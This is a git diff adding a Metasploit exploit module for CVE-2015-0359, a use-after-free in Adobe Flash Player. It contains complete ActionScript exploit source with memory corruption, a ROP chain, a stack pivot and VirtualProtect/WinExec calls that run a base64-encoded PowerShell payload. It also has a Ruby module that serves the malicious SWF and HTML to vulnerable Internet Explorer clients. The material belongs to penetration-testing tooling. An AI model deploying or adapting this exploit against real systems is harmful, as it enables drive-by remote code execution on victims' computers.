diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf new file mode 100755 index 0000000000..4befa69648 Binary files /dev/null and b/data/exploits/CVE-2015-0359/msf.swf differ diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as new file mode 100755 index 0000000000..1bf0cd1947 --- /dev/null +++ b/external/source/exploits/CVE-2015-0359/Msf.as @@ -0,0 +1,261 @@ +// Build how to: +// 1. Download the AIRSDK, and use its compiler. +// 2. Be support to support 16.0 as target-player (flex-config.xml). +// 3. Download the Flex SDK (4.6) +// 4. Copy the Flex SDK libs (/framework/libs) to the AIRSDK folder (/framework/libs) +// (all of them, also, subfolders, specially mx, necessary for the Base64Decoder) +// 5. Build with: mxmlc -o msf.swf Msf.as + +// Original code by @hdarwin89 modified to be used from msf +// https://git.hacklab.kr/snippets/13 +// http://pastebin.com/Wj3NViUu + +package +{ + import flash.display.Sprite + import flash.events.Event + import flash.utils.ByteArray + import flash.system.Worker + import flash.system.WorkerDomain + import flash.system.MessageChannel + import flash.system.ApplicationDomain + import avm2.intrinsics.memory.casi32 + import flash.display.LoaderInfo + import mx.utils.Base64Decoder + + public class Msf extends Sprite + { + private var ov:Vector. = new Vector.(25600) + private var uv:Vector. = new Vector. + private var ba:ByteArray = new ByteArray() + private var stack:Vector. = new Vector.(0x6400) + private var payload_space:Vector. = new Vector.(0x6400) + private var b64:Base64Decoder = new Base64Decoder() + private var payload:String = "" + private var worker:Worker + private var mc:MessageChannel + + public function Msf() + { + if (Worker.current.isPrimordial) mainThread() + else workerThread() + } + + private function mainThread():void + { + b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh) + payload = b64.toByteArray().toString() + ba.length = 0x1000 + ba.shareable = true + for (var i:uint = 0; i < ov.length; i++) { + ov[i] = new Vector.(1014) + ov[i][0] = ba + ov[i][1] = this + ov[i][2] = stack + ov[i][3] = payload_space + } + for (i = 0; i < ov.length; i += 2) delete(ov[i]) + worker = WorkerDomain.current.createWorker(this.loaderInfo.bytes) + mc = worker.createMessageChannel(Worker.current) + mc.addEventListener(Event.CHANNEL_MESSAGE, onMessage) + worker.setSharedProperty("mc", mc) + worker.setSharedProperty("ba", ba) + ApplicationDomain.currentDomain.domainMemory = ba + worker.start() + } + + private function workerThread():void + { + var ba:ByteArray = Worker.current.getSharedProperty("ba") + var mc:MessageChannel = Worker.current.getSharedProperty("mc") + var tmp:ByteArray = new ByteArray() + tmp.length = 0x2000 + + for (var i:uint = 0; i < 20; i++) { + new Vector.(1022) + } + + ba.writeBytes(tmp) + ov[0] = new Vector.(1022) + + mc.send("") + while (mc.messageAvailable); + + // Vector length corruption didn't work, aborting... + if (ov[0].length != 0xffffffff) { + return + } + + // Bad memory layout :( restoring length, and aborting... + if (ov[0][0x407] != 0x3f6) { + ov[0][0x3ffffffe] = 1022 + return + } + + ov[0][0] = ov[0][0x403] - 0x18 - 0x1000 + var buffer:uint = vector_read(vector_read(ov[0][0x408] - 1 + 0x40) + 8) //+ 0x100000 + var main:uint = ov[0][0x409] - 1 + var stack_object:uint = ov[0][0x40a] - 1 + var payload_space_object:uint = ov[0][0x40b] - 1 + var vtable:uint = vector_read(main) + var stack_address:uint = vector_read(stack_object + 0x18) as uint + var payload_address:uint = vector_read(payload_space_object + 0x18) as uint + vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 8) + vector_write(vector_read(ov[0][0x408] - 1 + 0x40) + 16, 0xffffffff) + mc.send(buffer.toString() + "/" + main.toString() + "/" + vtable.toString() + "/" + stack_address.toString() + "/" + payload_address.toString()) + } + + private function onMessage(e:Event):void + { + casi32(0, 1022, 0xFFFFFFFF) + if (ba.length != 0xffffffff) mc.receive() + else { + // Restoring vector length + var res:uint = casi32(0, 0xffffffff, 1022) + if (res != 0xffffffff) { // Something has been wrong... aborting + return + } + ba.endian = "littleEndian" + var data:Array = (mc.receive() as String).split("/") + var buffer:uint = parseInt(data[0]) as uint + var main:uint = parseInt(data[1]) as uint + var vtable:uint = parseInt(data[2]) as uint + var stack_address:uint = parseInt(data[3]) as uint + var payload_address:uint = parseInt(data[4]) as uint + var flash:uint = base(vtable) + var winmm:uint = module("winmm.dll", flash) + var kernel32:uint = module("kernel32.dll", winmm) + var virtualprotect:uint = procedure("VirtualProtect", kernel32) + var winexec:uint = procedure("WinExec", kernel32) + var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) + var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) + + // Continuation of execution + byte_write(buffer + 0x10, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable + byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main + byte_write(0, "\x89\x03", false) // mov [ebx], eax + byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + // Put the payload (command) in memory + byte_write(payload_address + 8, payload, true); // payload + + // Put the fake vtabe / stack on memory + byte_write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability... + byte_write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call dword ptr [eax+0A4h] + byte_write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot + byte_write(0, virtualprotect) + + // VirtualProtect + byte_write(0, winexec) + byte_write(0, buffer + 0x10) + byte_write(0, 0x1000) + byte_write(0, 0x40) + byte_write(0, buffer + 0x8) // Writable address (4 bytes) + + // WinExec + byte_write(0, buffer + 0x10) + byte_write(0, payload_address + 8) + byte_write(0) + + byte_write(main, stack_address + 0x18000) // overwrite with fake vtable + + toString() // call method in the fake vtable + } + } + + private function vector_write(addr:uint, value:uint = 0):void + { + var pos:uint = 0 + + if (addr > ov[0][0]) { + pos = ((addr - ov[0][0]) / 4) - 2 + } else { + pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1 + } + + ov[0][pos] = value + } + + private function vector_read(addr:uint):uint + { + var pos:uint = 0 + + if (addr > ov[0][0]) { + pos = ((addr - ov[0][0]) / 4) - 2 + } else { + pos = ((0xffffffff - (ov[0][0] - addr)) / 4) - 1 + } + + return ov[0][pos] + } + + private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) ba.position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) + if (zero) ba.writeByte(0) + } else ba.writeUnsignedInt(value) + } + + private function byte_read(addr:uint, type:String = "dword"):uint + { + ba.position = addr + switch(type) { + case "dword": + return ba.readUnsignedInt() + case "word": + return ba.readUnsignedShort() + case "byte": + return ba.readUnsignedByte() + } + return 0 + } + + private function base(addr:uint):uint + { + addr &= 0xffff0000 + while (true) { + if (byte_read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + private function module(name:String, addr:uint):uint + { + var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1 + while (true) { + var entry:uint = byte_read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + ba.position = addr + entry + if (ba.readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break + } + return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))) + } + + private function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) + var numberOfNames:uint = byte_read(eat + 0x18) + var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) + var addressOfNames:uint = addr + byte_read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) + for (var i:uint = 0; ; i++) { + var entry:uint = byte_read(addressOfNames + i * 4) + ba.position = addr + entry + if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break + } + return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + private function gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break + return addr + i + } + } +} diff --git a/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb new file mode 100644 index 0000000000..76b798a401 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb @@ -0,0 +1,112 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player domainMemory ByteArray Use After Free', + 'Description' => %q{ + This module exploits a use-after-free vulnerability in Adobe Flash Player. The + vulnerability occurs when the ByteArray assigned to the current ApplicationDomain + is freed from an ActionScript worker, when forcing a reallocation by copying more + contents than the original capacity, but Flash forgets to update the domainMemory + pointer, leading to a use-after-free situation when the main worker references the + domainMemory again. This module has been tested successfully on Windows 7 SP1 + (32-bit), IE 8 and IE11 with Flash 17.0.0.134. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'bilou', # Vulnerability discovery according to Flash Advisory + 'Unknown', # Exploit in the wild + 'hdarwin', # @hdarwin89 / public exploit (msf module is based on this one) + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0359'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], + ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/angler_ek_exploiting.html'], + ['URL', 'http://malware.dontneedcoffee.com/2015/04/cve-2015-0359-flash-up-to-1700134-and.html'], + ['URL', 'https://git.hacklab.kr/snippets/13'], + ['URL', 'http://pastebin.com/Wj3NViUu'] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.134') }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 14 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ + print_status('Sending SWF...') + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status('Sending HTML...') + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0359', 'msf.swf') + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end